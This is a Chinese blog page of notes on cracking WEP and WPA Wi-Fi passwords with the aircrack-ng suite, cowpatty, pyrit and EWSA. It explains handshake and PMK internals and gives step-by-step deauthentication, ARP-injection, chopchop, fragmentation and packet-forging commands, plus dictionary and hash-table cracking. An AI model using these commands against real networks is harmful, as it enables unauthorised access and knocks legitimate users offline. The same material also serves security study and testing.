奶嘴-破解无线

 

从零开始简要介绍

http://www.cbifamily.com/hard/harddim/2009-05-13/1242203280d86121.html

 

 

高速破解WPA密码的真相

http://blog.jdedu.net/u/6/archives/2009/3227.html

Tables

  可以说长期进行密码学研究的人很少有不知道这个的。在很多年前,国外的黑客们就发现单纯地通过导入字典,采用和目标同等算法破解,其速度其实是 非常缓慢的,就效率而言根本不能满足实战需要。之后通过大量的尝试和总结,黑客们发现如果能够实现直接建立出一个数据文件,里面事先记录了采用和目标采用 同样算法计算后生成的Hash散列数值,在需要破解的时候直接调用这样的文件进行比对,破解效率就可以大幅度地,甚至成百近千近万倍地提高,这样事先构造 的Hash散列数据文件在安全界被称之为Table表(文件)。

Rainbow Tables

最出名的Tables是Rainbow Tables,即安全界中常提及的彩虹表,它是以Windows的用户帐户LM/NTLM散列为破解对象的。

WPA-PSK Hash Tables

Tables的建立并没有想象的那么容易,就建立本身而言,其效率非常低下,加上需要指定预攻击AP 的SSID,想要建立一套针对所有常见接入点,并采用简单密码的WPA-PSK Hash Tables,其生成文件占据的硬盘空间最少也要1~~3G。需要深入了解WPA Table的读者,可以到这个名为The Church of Wifi的无线黑客组织了解更多内容,该组织官方站点为http://www.churchofwifi.org,该组织在过去的两年里成功建立了庞大的 WPA Table库,并将其简化的WPA-PSK Hash Table版本提供免费下载,对很多无线黑客而言,这确实是个福音,但遗憾的是,即便是简化版本,其大小也已经超过了30G。

制作WPA HASH TABLES

制作HASH:genpmk

使用HASH: cowpatty

http://www.school51.com/News/Content_43384.html

注:密码字典是Linux文本格式,每行只有换行(/n),而windows记事本格式的每行成对回车换行(/r/n)会出错。

文本文件格式转换:http://blog.csdn.net/zhangyang0402/archive/2010/01/07/5153649.aspx

或使用VIM转换:http://hi.baidu.com/qq5910225/blog/item/4ccb2e98c2167bb9c8eaf458.html

 

GPU运算破解WPA

http://security.zdnet.com.cn/security_zone/2009/0227/1350960.shtml

 

 

air破解工具系列

http://blog.csdn.net/MHY_MHY/archive/2008/11/07/3244543.aspx

http://www.freetstar.com/index.php/ubuntu10-04-aircrack-ng-hack-wiless-router

 

 

COWPATTY

作者:jwright@hasborg.com

让aircrack-ng能使用HASH TABLES

http://trac.aircrack-ng.org/ticket/23


compatty在windows下:
End of pcap capture file,incomplete TKIP four-way exchange?
1、由于你捕获的WPA握手包不完整(应为4次握手),所以无法正确PJ。建议你重新捕获。
2、当然,还有一种可能就是Cowpatty自身的问题,你可以升级到最新的4.6版再试试,或者放到aircrack-ng下PJ。

aircrack-ng doesn't need as much packets as cowpatty needs. That's why a capture that works with aircrack-ng might not work with cowpatty

 

 

PYRIT

高速破解(加载GPU、使用HASHTABLES,cowpatty由于不稳定不用)

 

 

使用python安装pyrit

 

 

 

 

破解WPA

获取WPA握手验证包

为了便于WPA握手验证包的获取,必须进行Deauth验证攻击,可以迫使AP重新与已连接的合法客户端进行握手验证,重新握手验证过程中获得验证数据包。
输入: aireplay-ng -0 10 -a <ap mac> wifi0
或者输入:aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解释:-0 指的是采取Deautenticate 攻击方式,后面为发送次数。

 

破解密钥(字典):aircrack-ng/ewsa + 字典(注:ewsa速度慢是因为开启了密码变动,禁止就行)
WPA密码破解必须使用字典破解模式。

输入:aircrack-ng –w password.txt –b <ap mac> 12345*.cap
(-w:是字典破解模式)
Password.txt是你事先准备好的字典。

注意:WPA的字典破解除了直接挂字典破解外,另外一种就是用airolib将字典构造成WPA table 然后再用aircrack进行破解。 构建WPA table就是采用和WPA加密采用同样算法计算后生成的Hash散列数值,这样在需要破解的时候直接调用这样的文件进行比对,破解效率就可以大幅提高。

 

破解密钥(HASH):cowpatty + hash

 

 

WPA破解不用等到数据Data 达到几万,因为它只要一个包含WPA握手验证包 就可以了

在四次握手的过程中,哪次握手最重要?

第2次握手信息相对来说比较重要,与第1次或第3次握手信息结合时才能破解密码。

 

破解WPA密码后仍不能连接AP的一种可能:

客户端使用错误的密码连接无线路由器也会产生握手包,如果字典内含有该错误的密码,那么将会得到一个错误的无线访问密码

鉴别正确的WPA密码:客户端使用错误的密码连接无线路由器,在四次握手操作后,无线路由器将发送 Deauthentication Packets 给客户端,拒绝客户端的访问。

http://blog.163.com/prince_vegeta/blog/static/28180356201011992647206/

 

注意:

Deauth 攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行,需要说明的是,攻击期间很可能会导致该AP的其它无线客户端无法正常上网即断网频繁,而且对于一些低端AP可能会导致其无线功能假死,无法ping通,需重起。

但在获得握手包时-0攻击不要太多,否则适得其反的。有些 AP几次握手不成就会认为有攻击。禁止客户端和 AP的链接30秒。

 

 

 

 

破解WPA底层原理

http://blog.163.com/prince_vegeta/blog/static/2818035620105109236871/

穷举法破解 WPA ,主要涉及到以下两个计算方法,当然,这也是 WPA 进行身份验证的方法:
1:PMK(PSK) <- pdkdf2_SHA1(passphrase, SSID)
2:PTK <- PRF-X(PMK, "Pairwise key expansion", AA, SA, ANonce, SNonce)

 

 

 

 

四次握手过程的简要描述:
1:无线接入点 AP 向客户端 STA 发送随机数 ANonce。
2:STA 收到 ANonce 后,选择一个随机数 SNonce ,利用 WPA 密码(passphrase)和 AP 的 SSID 计算得出 PMK(PSK),用 PRF-X 函数计算得出 PTK ,并使用 PTK 的前 16 bytes 和发往 AP 的信息计算出 MIC 认证值。将 SNonce 和 MIC 发送至 AP。
3:AP 收到来自 STA 的信息,用上面相同的方法计算出 MIC ,对 STA 生成的 MIC 进行校验,如果匹配,发送 ANonce 和其他信息。
4:装载 PTK 。

从 上面的描述可以看出, WPA 的认证实际上可以说是对 MIC 的认证 。 MIC 由 PTK 产生,计算 PTK 需要: ANonce 、 SNonce 、客户端 STA 的 Mac 地址 SA 、无线接入点 AP 的 Mac 地址 AA 、以及 PMK 。而 PMK 由 SSID 和 WPA 密码 (passphrase) 计算得出。假如我们知道了 passphrase ,而握手过程又是由合法的 STA 产生的,那么只要获得第1和第2次握手的信息,就已经能计算出 MIC 的值。这里要注意:是我们假如知道了 passphrase !

如果我们要使用穷举法破解 WPA ,用通俗易懂的说法描述,就是:
1: 从字典中取出一条密码 passphrase ,配合 AP 的 SSID,计算得出 PMK(PSK) ,可以使用 wpa_passphrase 命令生成,其结果将参与 PTK 的计算(genpmk的作用相当于重复多次调用wpa_passphrase )。有一点要说明,PMK(PSK) 说白了也就是 WPA 的密码,她不会出现在身份认证的网络传输过程中,PMK(PSK) 信息保存在认证双方的系统内部,否则,直接截取该信息,穷举就得了。见下图6:
2:截获客户端 STA 的 Mac 地址,无线接入点 AP 的 Mac 地址, AP 发往 STA 的随机数 ANonce , STA 发往 AP 随机数 SNonce ,配合上一步骤得到的 PMK(PSK) ,用这些参数生成 PTK 。
3:用上一步骤得到的 PTK 的前 16 bytes 计算出 MIC 值,用该值与第2次握手中 STA 发往 AP 的信息中的 MIC 值进行比较,如果一致,则证明步骤1取出的密码 passphrase  即为 WPA 的真实密码 PMK(PSK) 。
4: 现在流行的用 Hash 表快速破解的方法,实际上就是用指定的 SSID 和字典文件配合,生成字典内各个密码对应的 PMK(PSK) 。如果 SSID 具有通用性,那么生成的 Hash 表还可以分享给他人使用,否则无实用价值,因为 PMK(PSK) 是 SSID 和密码计算得出的。如果有了与破解目标 SSID 相应的 Hash 表,在破解的过程中可以免去计算 PMK(PSK) 的过程,从而达到节省破解时间的目的。见下图7:

 

对 EWSA 2.12 和 Aircrack-ng 这两款工具来说:
1:验证密码正确与否的关键是 MIC 信息,源自第2次握手,故:第2次握手信息丢失时,程序将无法进行破解工作。相应的,如果第2次握手信息是由非合法 STA 产生的,那么破解出来的密码也是非合法的密码,将不能使用,因为错误的密码会产生错误的 MIC 信息。虽然 coWPAtty 4.6 判断的是第4次握手中的 MIC 信息,比较严谨,但实际上效果并不好,大家可能发现过这个问题:有些握手包用 EWSA 和 Aircrack-ng 都能破解出来,但使用 coWPAtty 却不行,原因就在于此 。但可以使用 "-2" 参数修改成对第2次握手中的 MIC 信息进行判断。
2:AP 发往 STA 的随机数 ANonce 可由第1、3次握手中获得,但 STA 发往 AP 随机数 SNonce 只能在第2次握手中出现。所以,当第1次或第3次握手信息丢失后,仍然可以使用第2次握手的信息配合第3次或第1次握手产生的信息破解密码。但当第1次和 第3次握手同时丢失后,由于缺少 ANonce 信息,所以破解工作将不能继续。同样,如果第2次握手的信息丢失,由于缺少 SNonce 信息,破解工作也将不能继续。
3:由于第2次握手是 STA 发往 AP 的信息,包含两个重要的信息: MIC 和 SNonce 。故:作为处在混杂模式的网卡来说,AP 和 STA 的有效工作距离要弄清楚 ,没准儿你距离 STA 非常远——你的位置恰恰处于能接收到 AP 的信号,但不能接收到 STA 的信号,此时将无法获得 MIC 和 SNonce 信息,这就是为什么能获取到很多由 AP 产生的 IVs ,可死活获取不到握手信息的原因之一,此乃地利。当然,握手信息的截取是在 STA 和 AP 建立认证的过程中产生的,时机也很重要,此乃天时。

 

 

WPA加密算法的的两个版本介绍
WPA = 802.1x + EAP + TKIP + MIC
        = Pre-shared Key + TKIP + MIC
802.11i(WPA2)
        = 802.1x + EAP + AES + CCMP       
        = Pre-shared Key + AES + CCMP
这里802.1x + EAP,Pre-shared Key是身份校验算法 (WEP没有设置有身份验证机制),TKIP和AES是数据传输加密算法 (类似于WEP加密的 RC4 算法),MIC和CCMP数据完整性编码校验算法 (类似于WEP中 CRC32 算法)

 

WPA认证方式
802.1x + EAP  (工业级的,安全要求高的地方用。需要认证服务器)
Pre-shared Key  (家庭用的,用在安全要求低的地方。不需要服务器)
EAP 扩展认真协议,是一种架构。而不是定义了算法。常见的有 LEAP,MD5,TTLS,  TLS,PEAP,SRP,SIM,AKA 其中的 TLS 和 TTLS 是双向认证模式。

 


破解WPA密码的现实:难度相当的大

PSK=PMK=pdkdf2_SHA1(passphrase,SSID,SSID length,4096) ,在这个函数里的输入值都很明了除了这个4096。这就是设计者加入的防范。他的意思让函数迭代 4096次 。主要目的就是大大的降低字典攻击的效率。同时也增加了函数的复杂性。这个函数的消耗的时间占派生一个 MIC 的总时间的 99.3%。 也就是 SHA1_PRF,HMAC_MD5 这两个函数消耗的时间只占不到总时间0.7%。看到这里你也该明白所谓的建库破解是怎么回事了。就是先完成时间上99.3%的任务。产生一个 PMK 库。破解时只要完成时间上 0.7%工作了。这也就解释了为什么建库比较慢。这里我们建的库叫 PMK 库。或叫 HMAC 预运算库。

产生 PMK 如此费时,为什么硬件条件差的 AP 在握手时如此的迅速?实际是在你选择用WPA-PSK 模式后。AP 就开始用密码和 ESSID 产生 PMK(WPA-PSK 初始化)以后他都保存了这个PMK值。 除非你改ESSID或密码否则AP都不会花时间去生产PMK。 所以STATION和AP 握手如此的快速。所以增大上面算法中 4096 的值只会增加初始化时间而,不会对握手和传输数据有任何时间上的影响。但是对攻击者就不同了,如果增大 10 倍那么字典攻击的速度就只有原来的1/10了。

 

PMK 的优点是速度,但为之牺牲的是漫长的建库时间,巨大的磁盘空间,SSID 的针对性也是PMK 库的主要问题。 所以PMK 主要用于对付那种使用十分广泛的默认 SSID。一般陌生的SSID 没有必要为他建立 PMK。还有SSID 带有唯一性的。如新出的TP-LINK,SSID 变成了 TP-LINK+MAC 的前六位。这个做法无疑是想废了我们给 TP-LINK 做的 PMK库。从另一个角度来说 TP-LINK 无疑是一个很注重安全的生产商。。

 

网上破解WPA-PSK 的教程很多。都是几分钟就破解的。有些密码还很强。教程吗都不是实战。都是知道密码在破密码。所以不要让那些教程误导了。 以为破解 WPA-PSK 很容易。WPA-PSK 密码破解很长时间都不出来千万不要钻牛角尖。
到现在我们明白了针对 WPA-PSK 的攻击目前唯一有实际价值的是弱密码字典攻击。

好的弱密码字典在于精而不在于大。

 

下载深入wep和wpa密码原理


 

 

 

破解wep时各种情况的对策:

到数据增加到1.5万以上时,采用aircrack-ng 来进行破解

捕获包的位置:/tmp/Feedingbottle

 

一、有客户端

1、有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。

 

2、有客户端,合法客户端只能产生少量ivs 数据

通过要注入攻击加速产生大量ivs。

只要有少量的数据就可能获得arp 请求包(可能需要等待一段时间),则可用arp 注入模式的-3 模式通过不断向AP 发送
同样的arp请求包,来进行注入式攻击。

aireplay-ng -3 -b <ap mac> -h <合法客户端mac> wifi0

另一种方式:输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的APMAC)。

 

3、有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功。

-0 冲突模式强制断开合法客户端和ap连接,使之重新连接
利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
aireplay-ng -3 -b <ap mac> -h <合法客户端mac> wifi0
aireplay-ng -0 10 –a <ap mac> -c <合法客户端mac> wifi0

 

二、无客户端

因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。
这是非常关键的一步。为让AP 接受数据包,必须使自己的网卡和AP 关联。如果没有关联的话,目标AP
将忽略所有从你网卡发送的数据包,IVS数据将不会产生。
aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h < mac> wifi0

 

如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:
1、目标AP做了MAC地址过滤
2、你离目标AP物理距离太远
3、对方使用了WPA加密
5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道
也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上
tcpdump -n -e -s0 -vvv -i wifi0

 

方法1:

建立虚拟连接后直接用-2 交互攻击模式,这个模式集合了抓包和提取数据,发攻击包三种能力。
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0

 

方法2:

第一步

利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件);
然后通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包;
最后利用交互式攻击模式-2发包攻击。
采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。
输入aireplay-ng -5 -b <ap mac> -h <my mac> wifi0

也可

利用-4的Chopchop 攻击模式获得一个可用的包含密钥数据文件(xor 文件)
通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包
最后利用交互式攻击模式-2发包攻击。
采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件
输入aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
-b:设置需要破解的AP的mac
-h:设置用于连接的无线网卡的mac(自己网卡)

 

第二步

用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。
输入packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
参数说明:
-y (filename)是用来读取PRGA的文件
-w (filename)将arp包写入文件,我用的文件名是myarp

 

第三步

采用交互模式-2,发包注入攻击。
输入aireplay-ng -2 –r myarp -x 256 rausb0
【-r】:从指定文件中读取arp数据包
【-x】:定义每秒发送的数据包数量。为避免网卡死机,可选择256,最高不超过1024

 

http://www.xxszxw.net/xx/ShowArticle.asp?ArticleID=9325

http://blog.163.com/prince_vegeta/blog/static/281803562010117102733501/

 

aireplay-ng的6中攻击模式详解

-0   deautenticate冲突模式
使已经连接的合法客户端端强制断开与路由器的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。
如果一个客户端连在路由器上,但是没有人上网来产生有效数据,此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式来配合-3攻击来会被激活
aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0
参数说明:10 表示发送次数(设置为0表示循环攻击,客户端无法正常上网)
-a设置ap的mac地址,-c设置已连接的合法客户端的mac地址(如果要-c则所有与ap连接的客户端全部断线)


-1 fakeauth count 伪装一个客户端和ap进行连接
这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注入命令
aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
参数说明:0表示岩石0秒后连接;-e设置ap_essid;-a设置ap的mac地址 -h设置伪装客户端的网卡mac地址(就是自己网卡的mac地址)


-2 interactive 交互模式
这个模式集合了抓包和提取数据,发包注入三种功能
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0
参数说明:-p设置控制帧中包含的信息(16进制),默认采用0841;-c:设置目标mac地址;-b设置ap的mac地址;-h伪装的客户端网卡mac地址(就是自己的mac地址)
提取包,发送注入数据包
aireplay-ng -2 -r myarp -x 1024 wifi0
参数说明:myarp:自己设置的文件名;-x 1024:发包的速度(最大为1024)


-3 arp-request注入攻击模式
这种模式是一种抓包后分析重发的过程
aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0


-4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件
aireplay-ng -4 -b ap-mac -h my_mac wifi0


-5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)
aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包制造程序
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp
参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;-l:设置源文件IP和端口;-y:从xor文件中读取PRGA;name:xor文件的名字;-w设置伪装的arp包的文件名
aircrack-ng -n 64 -b ap_mac name-01.ivs

参数说明:-n设置key长度

 

 

 

比spoonwep2更傻瓜的破解工具minidwep

密码保存在keyfound文件中,find /  -name  keyfound*

 

 

字典破解密钥的工具

windows下:EWSA,Elcomsoft Wireless Security Auditor

第一步:选择简体中文 ,GPU顶如果显卡支持的可在选译些项。
第二步:选择握手包。
第三步:选择字典。
第四步:点击开始攻击。
第五步:等待P解成功的密码。

http://www.anywlan.com/bbs/viewthread.php?tid=68106

 

linux下:PYRIT

 

 

WPA中的各密钥:PSK->PMK->PTK----->MIC

WPA密码即PSK(pre-shared key),长度一般是8-63字节,它加上ssid通过一定的算法可以得到PMK(pairwise master key)。

PMK=SHA-1(ssid,psk) ,PMK的长度是定长的,都是64字节。由于计算PMK的过程开销比较大,是我们破解花费时间长的关键,所以采用以空间换时间的原则把PMK事先生成好,这个事先生成好的表就是常说的HASH表 (生成PMK的算法是一种哈希),这个工作就是用airlib-ng这个工具来完成的,快速破解就是这么来的。

 

认证的时候会生成一个PTK(pairwise temporary),这是一组密钥。它的生成方法也是采用的哈希,参数是连接的客户端MAC地址、AP的BSSID、A-NONCE、S-NONCE、PMK,其中A-NONCE和S-NONCE是两个随机数,确保每次连接都会生成不同的PTK。PTK的计算消耗很小。PTK加上报文数据采用一定的算法(AES或TKIP),得到密文,同时会得到一个签名,叫做MIC(message integrality check),tkip之所以被破解和这个mic有很大关系。

四次握手包中含有以上的哪些东西呢?
客户端的MAC地址,AP的BSSID,A-NONCE,S-NONE,MIC,最关键的PMK和PTK是不包含在握手包里的!

认证的原理是在获得以上的所有参数后,客户端算出一个MIC,把原文连同MIC一起发给AP,AP采用相同的参数与算法计算出MIC,并与客户端发过来的比较,如果一致,则认证通过,否则失败。


目前的破解方法是我们获得握手包后,用我们字典中的PSK+ssid先生成PMK(如果有HASH表则略过),然后结合握手包中的(客户端MAC,AP的BSSID,A-NONCE,S-NONCE)计算PTK,再加上原始的报文数据算出MIC并与AP发送的MIC比较,如果一致,那么该PSK就是密钥

目前最耗时的就是算PMK,可谓破解的瓶颈。即使搞定了运算量的问题,海量的密钥存储也是个问题(PMK都是64字节长度)!

wpa_supplicant 套件中有个小工具,叫做wpa_passphrase,它和airolib-ng的作用差不多,都是用来生成PMK,在backtrack中应该自带这个工具。

 

 

Wireshark抓取WPA握手包

过滤:

从CAP文件中提取WPA的握手包实际上就是提取EAPOL(LAN上的EAP)协议包,在Wireshark的Filter中输入“eapol” 即可获得。
但这样获得的CAP文件用aircrack-ng打开会发现丢失了ESSID,注意:那个非WPA加密的ESSID已经消失了。
解决的方法:保留CAP包中的Beacon frame,更改Filter为:“eapol or wlan.fc.type_subtype == 0x08” ,其中,“0x08”为Subtype,即:“Beacon frame”。
当然,也可以进一步将EAPOL-STAR包去掉,更改Filter为:“(eapol and eapol.type != 1) or wlan.fc.type_subtype == 0x08” ,其中,“type != 1”意思是丢掉STAR包,但这样写Wireshark会给出一个警告,解决方法:只保留包含KEY信息的包,更改Filter为:“eapol.type == 3 or wlan.fc.type_subtype == 0x08”,其中,
“3”为KEY信息包的Subtype。

http://zhaochunsheng.blog.china.com/200904/4591202.html

 

 

遇到的问题:

在debian下安装cowpatty出现错误,make时提示“...: *** [md5.o] 错误 1”。

原因:文件依赖

解决:

apt-get install libssl-dev
apt-get install libpcap0.8-dev
then try make.

 

beini查看/编辑文件

nano

 

 

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值